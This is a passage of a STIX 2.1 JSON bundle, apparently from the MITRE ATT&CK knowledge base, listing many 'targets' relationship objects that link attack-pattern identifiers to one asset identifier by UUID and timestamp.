"spec_version": "2.1", "id": "relationship--f4a7d750-ce86-4cff-baf4-f4458cb583f2", "created": "2024-07-01T10:37:15.821680", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821683", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e55b7f47-b041-4281-9504-a0207c69dd19", "created": "2024-07-01T10:37:15.821690", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821693", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7edc9ffc-600a-48dc-af34-009b5d1a68da", "created": "2024-07-01T10:37:15.821700", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821703", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2a10b991-90f0-4ed4-8c99-f958f0f6b8e8", "created": "2024-07-01T10:37:15.821710", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821713", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ad23593-4bab-4a54-91ff-b1ba618aef9a", "created": "2024-07-01T10:37:15.821721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821723", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f49ce182-1398-4926-86d1-43dd1b15fd0f", "created": "2024-07-01T10:37:15.821731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa4bb0e3-77fd-4df0-87ed-9b08bc3c670e", "created": "2024-07-01T10:37:15.821741", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--984b6f6c-4ad8-4400-9302-9273f38d4909", "created": "2024-07-01T10:37:15.821751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f32a7673-5e49-411a-9a42-1fc3982a7aa6", "created": "2024-07-01T10:37:15.821761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92c854e9-dd93-4c10-8fd7-628f603c1a49", "created": "2024-07-01T10:37:15.821771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c1fdc46-6a96-485c-a155-98ae56d483b7", "created": "2024-07-01T10:37:15.821781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821783", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0464e26a-03eb-496f-aaf4-070e37074a6f", "created": "2024-07-01T10:37:15.821791", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821793", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--460b3375-8523-49de-a535-4d7a5cae2c34", "created": "2024-07-01T10:37:15.821801", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821803", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9ee4370c-5440-4abc-b53c-e87d21d5bf89", "created": "2024-07-01T10:37:15.821811", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821813", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb9a2d63-253d-4050-b3ee-15e60341cc95", "created": "2024-07-01T10:37:15.821821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43df262c-0dae-426f-ba77-a075bb01d68a", "created": "2024-07-01T10:37:15.821831", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821833", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0978f114-e568-4ec1-9920-73f99b86e461", "created": "2024-07-01T10:37:15.821841", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821843", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f625fe48-29e1-4aed-a6af-04c80209cef7", "created": "2024-07-01T10:37:15.821851", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821853", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b76c1ba1-cd10-462c-95bc-67414d89c92f", "created": "2024-07-01T10:37:15.821861", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821863", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cb48f619-2324-49f9-a72a-96291effad3e", "created": "2024-07-01T10:37:15.821871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a0db8186-2629-49bb-90fa-54e7343ef069", "created": "2024-07-01T10:37:15.821881", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821883", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d1c8985-7249-44a9-a211-20e1b13f3d20", "created": "2024-07-01T10:37:15.821891", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0114cb19-133a-4b1c-9cb0-0ce09aa2d52a", "created": "2024-07-01T10:37:15.821901", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821903", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea564dd7-11a6-493a-84b5-d5bad7ebd9ed", "created": "2024-07-01T10:37:15.821911", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821914", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7a990b54-a212-491d-8a42-9824648b0131", "created": "2024-07-01T10:37:15.821922", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821924", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ec99007-f140-4e16-b1fd-5ba2454615bd", "created": "2024-07-01T10:37:15.821932", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821934", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b43432b8-5bb9-46d3-95e5-45a97779fb6d", "created": "2024-07-01T10:37:15.821942", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821944", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b2975143-9ae2-4e76-93a4-300152856f3d", "created": "2024-07-01T10:37:15.821955", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821957", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4e893391-77a4-45d6-93dc-60718cf55583", "created": "2024-07-01T10:37:15.821965", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821967", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9cc7f35b-a5ca-4c0f-898e-c4a15f7e404f", "created": "2024-07-01T10:37:15.821975", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821977", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1dec814d-16b3-4680-8f4b-226d47db2516", "created": "2024-07-01T10:37:15.821986", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821988", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eaa31cd5-227b-443d-b8dc-33c3a3440c5a", "created": "2024-07-01T10:37:15.821996", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.821998", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3e36d712-1474-4647-a9cc-bb7575ab2b88", "created": "2024-07-01T10:37:15.822006", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822008", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--975081f1-2d4a-4780-84b2-0978b3a72aae", "created": "2024-07-01T10:37:15.822016", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822018", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a20756f6-cc6c-435a-8baf-8a0ac445570a", "created": "2024-07-01T10:37:15.822026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822028", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6c1dbdf8-a81e-4936-a33d-3dc6921a30f5", "created": "2024-07-01T10:37:15.822036", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822038", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--64247e4b-cd9c-46aa-a9a7-2dc3b1fbe0ee", "created": "2024-07-01T10:37:15.822046", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822048", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4c933547-809e-45ff-acf5-311dada2d745", "created": "2024-07-01T10:37:15.822056", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822058", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa192970-f2c1-4756-939f-feb300ad28ad", "created": "2024-07-01T10:37:15.822066", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822068", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6bc07e5-413c-4fd7-85e1-2700f73298f2", "created": "2024-07-01T10:37:15.822076", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822078", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ee2730c-f771-4dc6-b650-94c694aa0182", "created": "2024-07-01T10:37:15.822086", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.822088", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--878f83a5-48c4-412e-bb58-776771f24433", "created": "2024-07-01T10:37:15.822096", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], 